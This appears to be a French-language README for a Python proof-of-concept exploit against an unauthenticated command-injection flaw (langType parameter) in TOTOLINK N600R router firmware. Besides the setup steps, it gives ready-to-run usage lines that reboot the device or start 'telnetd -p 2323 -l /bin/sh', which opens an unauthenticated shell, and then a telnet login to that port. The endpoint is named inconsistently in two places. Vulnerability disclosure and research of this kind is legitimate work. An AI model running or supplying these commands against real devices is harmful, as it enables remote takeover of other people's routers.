
Preuve de concept en Python pour une injection de commandes système non authentifiée dans le TOTOLINK N600R, exploitant le paramètre langType pour exécuter des commandes arbitraires sur l’appareil.
Preuve de concept en Python pour l'injection de commande non authentifiée dans le TOTOLINK N600R.
| Produit | TOTOLINK N600R |
| Firmware | V5.3c.7159_B20190425 |
| Type | Injection de commande système (CWE-78) |
| Paramètre | langType |
| Point d'accès | /cgi-bin/cstecgi.cgi |
| CVSS v3.1 | 9.8 Critique |
Il a été découvert que le TOTOLink N600R V5.3c.7159_B20190425 contient une vulnérabilité d'injection de commande via le paramètre langtype dans /setting/setLanguageCfg.
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
# Usage: python3 poc.py <TARGET> <COMMAND>
# Example: python3 poc.py 192.168.68.1 "reboot"
# Example: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"
python3 poc.py <TARGET> <COMMAND>
Utilisation du PoC pour exécuter à distance sur la cible l'activation de /bin/sh sur le port 2323
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Voir le résultat si le port 2323 a été activé

Connectez-vous à la cible en utilisant telnet via le port 2323
telnet 192.168.68.1 2323

Fourni tel quel, sans garantie. L'auteur n'est pas responsable d'une mauvaise utilisation ou de dommages.